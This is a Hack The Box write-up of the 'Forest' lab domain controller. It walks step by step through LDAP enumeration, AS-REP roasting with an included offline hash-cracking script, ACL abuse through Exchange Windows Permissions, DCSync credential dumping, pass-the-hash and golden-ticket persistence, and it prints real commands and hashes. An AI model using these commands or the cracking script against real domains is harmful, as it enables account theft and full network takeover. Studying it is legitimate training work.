HTB Writeups

Forest

Personal Rating: Medium

This box was rather easy at first, as I had just completed the HTB Academy Attacking AD and Windows privilege escalation modules. However, the ACL abuse to Domain Admin was tedious and hard to get to work.

Enumeration

Running an nmap scan:

sudo nmap -p- -sV -sC <IP>

Note that a full-port version scan with default scripts is slow and noisy; that might not be acceptable in a real pentesting engagement.

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-23 12:33:23Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open               Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49706/tcp open  msrpc        Microsoft Windows RPC
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local

The open ports (DNS, Kerberos on 88/464, LDAP on 389/636 plus the global catalog on 3268/3269, SMB, WinRM on 5985) identify this as the domain controller for htb.local. There is no web server; 5985 and 47001 are only the WinRM/HTTPAPI listeners.

SMB Null Authentication

Null Authentication seems to work:

poetry run crackmapexec smb 10.10.10.161 -u '' -p ''
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\:

But I could not enumerate shares with this method.

LDAP Enumeration

Running nmap's LDAP scripts (they use an anonymous bind) was successful:

sudo nmap -n -sV --script "ldap* and not brute" 10.10.10.161 > nmap-ldap.txt
  • The lockout threshold is 0, so password brute-forcing or spraying against users would be viable without locking anyone out.

  • I could enumerate some groups, but that is not interesting at the moment.

Using windapsearch I could fetch more information:

python3 windapsearch.py --dc-ip 10.10.10.161 -l "DC=htb,DC=local" > ldapinfo-windapsearch.txt

The resulting file was massive with nearly 8000 lines.

[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=htb,DC=local
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None
[+]	 Using DN: DC=htb,DC=local

<SNIP>

I could enumerate the users and groups though:

python3 /home/user/Documents/windapsearch/windapsearch.py --dc-ip 10.10.10.161 -l "DC=htb,DC=local" -U | grep sAMAccountName

sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: Users
sAMAccountName: Guests
sAMAccountName: Remote Desktop Users
<SNIP>
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
sAMAccountName: test

Before I try a password brute-force or spray, I want to enumerate for Kerberoasting and AS-REP roasting.

GetUserSPNs.py found no Kerberoastable users.

AS-REP Roasting

An AS-REP roast did work: svc-alfresco has "Do not require Kerberos preauthentication" set, so the KDC hands an AS-REP encrypted with the account's key to anyone who asks for one.

GetNPUsers.py -dc-ip 10.10.10.161 -request htb.local/

$krb5asrep$23$svc-alfresco@HTB.LOCAL:8a0ea34bea471b1532011ad9ed356eb0$434e5a983d1a2547c41eb1bee9b293b3d14ae7721c818e88e86fce349326e9c059433f821b6b16903c98a7075d035e6a64b3ad3baeef73282357f45d34c833ffd1a376a323e9f67ce3929727983f31a918632406648d91d9edbe7061e6ab42c4c0b3f58b4af1fd15b5c0fbfafca0d6bb1e00fcd9293fac9645d6e53109c3df2618e2aaa082bf294092ccbc3af41c0ea6a62b500423b0e875da6ce1930f35f467593761121ca55aecc113e483d5b46ae39b8c17ad5318d0a87ea2472f6bfed5bdc70d4a298af97337aa89c7966d12fdf50d30b4a8e71562068224726fdad5f9a4a9e88096989e
  • With hashcat -a 0 -m 18200 <SNIP> rockyou.txt (mode 18200 is Kerberos 5 AS-REP etype 23) I could crack the password for the user: svc-alfresco:s3rvice

  • With these creds I could access the host with evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

AMSI bypassing, which evil-winrm has an integrated module for, was not required here.
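The hash above is hashcat's mode 18200 format: $krb5asrep$23$<user>@<REALM>:<HMAC-MD5 checksum>$<RC4 ciphertext>. It is crackable offline because for etype 23 the Kerberos key is simply the account's NT hash (MD4 over the UTF-16LE password), so every wordlist entry can be turned into a key and tested against the checksum. The following Python script is an added example written for this page; it is not impacket's or hashcat's code. It implements that check end to end (pure-Python MD4, RC4, the RFC 4757 key derivation with key usage 8) and, because the plaintext behind the page's real hash is not known here, forges a sample line locally from the recovered password s3rvice so that it runs offline. The function names and the fake EncASRepPart bytes are mine.

```python
"""Offline check of an AS-REP roast hash in hashcat 18200 format (added example).

Re-implements the etype 23 (RC4-HMAC, RFC 4757) verification hashcat performs:
NT hash from the candidate password, decrypt the enc-part, recompute the checksum.
"""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
ASREP_KEY_USAGE = 8  # RFC 4120 usage 3 (AS-REP enc-part) is mapped to 8 for RC4-HMAC


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled on OpenSSL 3 builds."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & MASK

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a, b, c, d = d, rol((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rol((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rol((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for etype 23 this *is* the Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (encrypt and decrypt are the same operation)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def parse_asrep(line: str):
    """Split '$krb5asrep$23$user@REALM:<checksum hex>$<enc-part hex>' into its parts."""
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("not an etype-23 AS-REP hash")
    principal, rest = line[len(prefix):].split(":", 1)
    checksum, edata = rest.split("$", 1)
    return principal, bytes.fromhex(checksum), bytes.fromhex(edata)


def check_password(line: str, candidate: str) -> bool:
    """True if `candidate` is the account password: decrypt, then re-check the HMAC."""
    _, checksum, edata = parse_asrep(line)
    k1 = hmac_md5(nt_hash(candidate), struct.pack("<I", ASREP_KEY_USAGE))
    k3 = hmac_md5(k1, checksum)          # per-message RC4 key is derived from the checksum
    plain = rc4(k3, edata)               # 8-byte confounder || EncASRepPart
    return hmac.compare_digest(hmac_md5(k1, plain), checksum)


def forge_asrep(user: str, realm: str, password: str, enc_part: bytes) -> str:
    """Build a hash line the way the KDC would (constructed sample for offline testing)."""
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", ASREP_KEY_USAGE))
    plain = os.urandom(8) + enc_part
    checksum = hmac_md5(k1, plain)
    k3 = hmac_md5(k1, checksum)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${rc4(k3, plain).hex()}"


def crack(line: str, wordlist):
    """Return the first wordlist entry that verifies, or None (what hashcat -m 18200 does)."""
    for word in wordlist:
        word = word.rstrip("\n")
        if check_password(line, word):
            return word
    return None


# Constructed sample: fake EncASRepPart bytes (real ones are ASN.1 starting with 0x79)
# encrypted under the password this writeup recovered, so the check runs without the box.
SAMPLE_HASH = forge_asrep("svc-alfresco", "HTB.LOCAL", "s3rvice", b"\x79\x81\x00" + b"A" * 40)

if __name__ == "__main__":
    print(nt_hash("").hex())   # 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password
    print(crack(SAMPLE_HASH, ["Password1", "s3rvice"]))
```

Fed the real line from GetNPUsers.py and rockyou.txt, crack() does exactly what hashcat -m 18200 does, only many orders of magnitude slower; the point of the script is to see what the checksum commits to and why a weak service-account password is all it takes.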

Bloodhound Investigations

Now, since this is a DC and I can authenticate with a domain user, BloodHound came to mind. The goal is to compromise the local Administrator, but on a DC that is the same as gaining Domain Admin privileges. I like to run the SharpHound collector when there is no antivirus blocking it. Otherwise you might use the PowerShell version and take further steps to evade AV, like an AMSI bypass, heavy obfuscation, SharpHound's stealth collection options etc.

I exfiltrated the collected zip file using smbserver.py on my machine and 'net use' on the target.

Checking BloodHound, this path is the first one I looked into (screenshot omitted):

This one can not be abused right now, as it would require SYSTEM privileges on the host, for example to run mimikatz. But the following path works unprivileged:

svc-alfresco is an indirect (nested) member of ACCOUNT OPERATORS. Account Operators can change the membership of groups that are not protected by AdminSDHolder, and EXCHANGE WINDOWS PERMISSIONS is such a group; it in turn holds WriteDacl on the domain object. So the plan is: add ourselves to Exchange Windows Permissions, then use WriteDacl on the domain to grant ourselves the replication rights that make DCSync possible.

ACL Abuse Path

I could add svc-alfresco to the target group from the evil-winrm session (the ActiveDirectory module is available on a DC) with:

Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members svc-alfresco

The simpler net-command variant, which creates a fresh domain user and adds that one instead:

net user john password123 /add /domain
net group "Exchange Windows Permissions" john /add /domain

The PowerShell version, possibly with a PowerShell downgrade attack or encoded after an AMSI bypass, would usually be the preferred way here for stealth; net.exe invocations are a common detection trigger.

I tried abusing the ACLs for hours, but could not find a solution. This was it in the end, after adding the user john to the Exchange group:

python3 DCSync.py -t 'CN=john,CN=Users,DC=htb,DC=local' -dc forest.htb.local htb.local\\john:password
python3 secretsdump.py htb.local/john:password@forest.htb.local

I did not know the DCSync.py script before, and the other scripts I tried did not work. I also tried to do it LotL-style with pure PowerShell, but that failed too. The commands above yielded what I wanted, though.

What happens here: DCSync.py binds to LDAP as john and, using the WriteDacl that Exchange Windows Permissions holds on the domain object, adds ACEs granting john the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights; secretsdump.py then authenticates as john and uses those rights to replicate every account's NT hash out of NTDS, the same way a real DC would. The PowerView equivalent is Add-DomainObjectAcl -TargetIdentity 'DC=htb,DC=local' -PrincipalIdentity john -Rights DCSync, run with a credential for john. One practical caveat that explains many "it should work but doesn't" moments with this path: group membership is placed in the access token at logon, so a session opened before the account was added to Exchange Windows Permissions does not carry the new right. A fresh logon, or, as here, a newly created user authenticating from the attack box, sidesteps that.

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::

Pass the Hash

With evil-winrm and pass-the-hash (-H) I could then access the machine as Administrator.

evil-winrm -u Administrator -i <IP> -H '32693b11e6aa90eb43d32c72a07ceea6'

NOTE: secretsdump prints each account as user:RID:LM hash:NT hash. The NT hash (the second one, here 32693b11…) is what NTLM authentication actually uses, so it is the part you pass with -H. The LM hash field reads aad3b435b51404eeaad3b435b51404ee for every account: that is the LM hash of an empty string, which is what gets reported when LM hash storage is disabled (the default since Windows Vista / Server 2008), not a shared password. Guest's NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is likewise the NT hash of an empty string, i.e. a blank password on a disabled account.

Since this machine is a DC, the krbtgt NT hash from the same dump (together with the domain SID, e.g. from lookupsid.py or Get-ADDomain) is enough to forge a golden ticket with ticketer.py or mimikatz for persistence; such tickets stay valid until the krbtgt password has been changed twice.


Last updated 1 year ago